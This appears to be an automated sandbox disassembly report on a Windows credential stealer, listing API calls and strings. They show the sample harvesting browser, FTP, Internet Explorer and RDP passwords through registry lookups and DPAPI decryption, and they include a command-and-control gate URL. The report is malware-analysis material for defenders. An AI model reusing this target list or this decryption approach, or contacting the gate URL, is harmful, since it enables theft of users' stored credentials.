                                                • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: Line
                                                • API String ID: 4012628704-1898322888
                                                • Opcode ID: 84f5e434c5f61887cc715fb1ba0726c8c6d833bb2d725b88ee3c298d36885c8a
                                                • Instruction ID: c1fe354c5df2d147472c63de0b99e33003b149c2ae87472fa03303622d3e56eb
                                                • Instruction Fuzzy Hash: 652139B590011CBACF21ABA1CC41AED7BB9BF40304F00C4B6B644B50A0DB799B969F99
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3CC
                                                • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: .wjf
                                                • API String ID: 4012628704-198459012
                                                • Opcode ID: d143b4ee2f8d50745b00719615fd45277ead690ac8305e40d53a9108f53902ff
                                                • Instruction ID: 445ef7b8b1bb7aa2afab0b85c8d47674782cb6e9d867fe5de917610d2ab08f6a
                                                • Instruction Fuzzy Hash: EE110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99
                                                APIs
                                                  • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                  • Part of subcall function 004027F7: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                  • Part of subcall function 004027F7: GlobalLock.KERNEL32(?), ref: 004028BB
                                                  • Part of subcall function 004027F7: GlobalUnlock.KERNEL32(?), ref: 004028DD
                                                • CoCreateGuid.OLE32(?,00000000), ref: 0040458F
                                                • wsprintfA.USER32 ref: 004045D6
                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                                                Similarity
                                                • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                • API String ID: 1852535927-1100116640
                                                • Opcode ID: 9c8c72e958f692cd5c17bb4aee1ff0ebe95c06f2e591f1655062e6d771a0606b
                                                • Instruction ID: f53fd9df19a37a7436308050770a6827e165c979ed20dd1958a16c82b6db0aed
                                                • Instruction Fuzzy Hash: 201139A68041987DDB61E3E68C05EFFBAFC590D305B1404ABB6A0E20C2D57DD780AB39
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                • API String ID: 3062143572-2631691096
                                                • Opcode ID: 31845e8f246ef1c047a1e8acefb0eee754fa816f229e193014710dde568ae4c8
                                                • Instruction ID: e7b17ff52d166462a165f3b6913ad71960ce3cd8d7ded6adb1efb220650c7e13
                                                • Instruction Fuzzy Hash: 4EF06270640208BADF20EB51CC47FCD7A659B04704F10807A7644740E3DFB9CAD09A48
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                • API String ID: 3062143572-164276155
                                                • Opcode ID: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
                                                • Instruction ID: 6c0ca7a26b87c7c70e6a01aab92075298d7fe0072118fde892d006f484df090e
                                                • Instruction Fuzzy Hash: CBF01270680208BADF10AB51CD43FCD7B669B14748F1180667704751E3D7B9DAD19A48
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                • API String ID: 3062143572-1276807325
                                                • Opcode ID: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
                                                • Instruction ID: f5280ec9e0107380a21299960ef084744ae8c2892abc79ad58e4b51ce706d511
                                                • Instruction Fuzzy Hash: FCF01730680208BADF51AB61CC43FCD7AB5AB14749F218076BA48751E3DBB9DAD19A48
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                • API String ID: 3062143572-2716603926
                                                • Opcode ID: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
                                                • Instruction ID: ad10bed4d9095064944b6f1b39750bb114de016addf6147f224309e21cc9b741
                                                • Instruction Fuzzy Hash: C2F03630680208BADF50BF51CC43FCD7A659B14745F1140667A08751E3DBF9DAD19B4C
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,Odin), ref: 0040A0F4
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID: 8Ap$Odin$SiteInfo.QFP$XDp
                                                • API String ID: 2826327444-1406308668
                                                • Opcode ID: 30f2ad5037439782e851f0c47a1bf2b858e7b138a18d7a7ae1bf3ad4c08d3565
                                                • Instruction ID: cb19261180e9835e7d6e10c1a09fddbbd42b6fc3f6f61c88a0af093412c8222d
                                                • Instruction Fuzzy Hash: E501D670500205BAEB213B258C06FAF7E59DB82314F24413BBD10B51E3E67C8EA192ED
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF21
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                                                  • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                                                Similarity
                                                • API ID: wsprintf$CloseEnumOpen
                                                • String ID: SiteServers
                                                • API String ID: 1693054222-2402683488
                                                • Opcode ID: a1f11ff4e54de8a2f1f41c19bf27dd541094ac564e6bd5b78484b3e2af1c4403
                                                • Instruction ID: a446ecacf4174ee40ccddb23f5ff2609404a5ff37a742fe041fe98d7ce509aa6
                                                • Instruction Fuzzy Hash: C131287190021DEADF21AB51CD42BDEBAB9FF04304F04C0B6B154750A1DB795BA2AF9A
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D65
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: MRU
                                                • API String ID: 1332880857-344939820
                                                • Opcode ID: eed336e1a62e36d599677b71e4fa2249832b60eb19a1861c88a116fd1c8e9e9c
                                                • Instruction ID: 0962f506e68cdd8ccaa0ff695c2f519e513318d4d31b2a5f0dea04bfe0af0b42
                                                • Instruction Fuzzy Hash: 8821F331900108BADF11AB51CD42FDE7BBABF00304F1085BAB554B50E1DBB95B91AF98
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID:
                                                • API String ID: 1586453840-0
                                                • Opcode ID: 56cdd0336bac98b00ff7424e586f2218e00cec739b08c9fb7428d64b0c3150db
                                                • Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
                                                • Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59
                                                APIs
                                                • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BE49
                                                • lstrcmp.KERNEL32(table,?), ref: 0040BE7E
                                                  • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                                                Similarity
                                                • API ID: lstrcmplstrcmpi
                                                • String ID: logins$table
                                                • API String ID: 3524194181-3800951466
                                                • Opcode ID: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
                                                • Instruction ID: 4e1aa7e609f9c63133400eaf0fbab0bfe716398796ba7bb72f53a7a8be838654
                                                • Instruction Fuzzy Hash: FB31E97581020EFACF21DF94CC469EEBB79EB04328F204276A121B61E0D7759A54DF9C
                                                Similarity
                                                • API ID:
                                                • String ID: "password" : "
                                                • API String ID: 0-2310853927
                                                APIs
                                                • wsprintfA.USER32 ref: 0040D315
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                • API String ID: 988369812-376751567
                                                APIs
                                                • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                                                • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                                                • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                                                Similarity
                                                • API ID: CloseExitFileHandleProcessRead
                                                • String ID:
                                                • API String ID: 1390701169-0
                                                APIs
                                                  • Part of subcall function 00403FFB: WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                                                Similarity
                                                • API ID: SleepStartup
                                                • String ID: Client Hash$http://admino.ml/eme/gate.php
                                                • API String ID: 1372284471-2973176254
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407619
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID:
                                                • API String ID: 4012628704-0
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 0040380F
                                                • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
                                                • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876
                                                Similarity
                                                • API ID: closesocketconnectsocket
                                                • String ID:
                                                • API String ID: 643388700-0
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3F3
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F350
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID:
                                                • API String ID: 1332880857-0
                                                APIs
                                                • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CBAB
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                                                • EasyFTP, xrefs: 0040CBA3
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                                • API String ID: 1884169789-2776585315
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                                                Similarity
                                                • API ID: AllocFolderLocalPath
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 1254228173-2036018995
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                • String ID: \32BitFtp.ini
                                                • API String ID: 2776971706-1260517637
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 004024DF
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 2574300362-0
                                                APIs
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: .xml
                                                • API String ID: 1659193697-2937849440
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
                                                • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F
                                                Similarity
                                                • API ID: CloseExitHandleProcess
                                                • String ID:
                                                • API String ID: 1046136549-0
                                                APIs
                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401FC6
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401FE1
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Similarity
                                                • API ID: EnvironmentExpandLocalStrings$AllocFree
                                                • String ID:
                                                • API String ID: 2376306162-0
                                                • Opcode ID: f12fd6f9597f56dc7ccf965001f0c4b7f47bfccdea30f1c07eb7795496cc88c6
                                                • Instruction ID: d8336d695edfc154b3b45a9711e618b47250add4b5adda8f5b079a4b1d77d4f2
                                                • Opcode Fuzzy Hash: f12fd6f9597f56dc7ccf965001f0c4b7f47bfccdea30f1c07eb7795496cc88c6
                                                • Instruction Fuzzy Hash: 1CE0ED7190410AFAEB10BAB59D02BAE7A69AB00358F20453A7504F51E1DBB99F60A668
                                                 Similarity
                                                 • API ID: gethostbynameinet_addr
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0041062F
                                                • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                                 Similarity
                                                 • API ID: CountExitProcessTick
                                                APIs
                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                                                 Similarity
                                                 • API ID: FileWrite
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                 Similarity
                                                 • API ID: Startup
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401018
                                                 Similarity
                                                 • API ID: CreateGlobalStream
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                 Similarity
                                                 • API ID: AllocLocal
                                                APIs
                                                • LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                 Similarity
                                                 • API ID: FreeLocal
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 004098CF
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 004098EC
                                                • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
                                                • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                 Similarity
                                                 • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                 • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                 Similarity
                                                 • String ID: explorer.exe
                                                 Similarity
                                                 • String ID: 123456
                                                APIs
                                                  • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                  • Part of subcall function 0040A2A9: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                                                • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A615
                                                • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                                                • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                                                • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                                                • LocalFree.KERNEL32(?), ref: 0040A6DF
                                                • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A709
                                                 Similarity
                                                 • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                 • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                                                • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                                                • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                                                • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                                                • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                                                • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                                                • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                                                • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                                                 Similarity
                                                 • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                 • String ID: ftp://$http://$https://
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 004089FA
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408A17
                                                • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
                                                • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                 Similarity
                                                 • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                 • String ID: *.*$\*.*
                                                APIs
                                                • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                                                • lstrlenW.KERNEL32(00416369,?,?,00000000), ref: 0040AA1D
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                                                • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                                                • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                • String ID: Microsoft_WinInet_*$icA
                                                • API String ID: 3891647360-3506372221
                                                • Opcode ID: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                • Instruction ID: ec4eec63bcc124374d5f2d7e6b4d46d77861198517d8893598619f99e1c26cfb
                                                • Opcode Fuzzy Hash: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                • Instruction Fuzzy Hash: 9C312D71A00209EADF21CF84DD05BEEB7B4EB44315F15443AE951B61D0D3BC9A94CBAA
                                                APIs
                                                • lstrlen.KERNEL32(00000000), ref: 0040CEE2
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                                                • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID: full address:s:$password 51:b:$username:s:
                                                • API String ID: 2920030623-2945746679
                                                • Opcode ID: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                • Instruction ID: 54cf008bb3eae58b1a30e6a5af3c8a5bf0615ee99b7eb6d7c5b05f7a3dd5831b
                                                • Opcode Fuzzy Hash: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                • Instruction Fuzzy Hash: FE414F3190010AEADF11ABE5C886BEEBF76EF44714F10423BE601711E1D7794A92DB5A
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 0040AB39
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                • LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID:
                                                • API String ID: 2920030623-0
                                                • Opcode ID: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                • Instruction ID: 9475b3dff48bb3a680590f8f4b8fbf70d62397470b3612e928ce05771e3a80a2
                                                • Opcode Fuzzy Hash: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                • Instruction Fuzzy Hash: C731C7776042099FEF209E58D844BCDB776EB85374F504133DB51A72C4D2BCAA92CA4E
                                                APIs
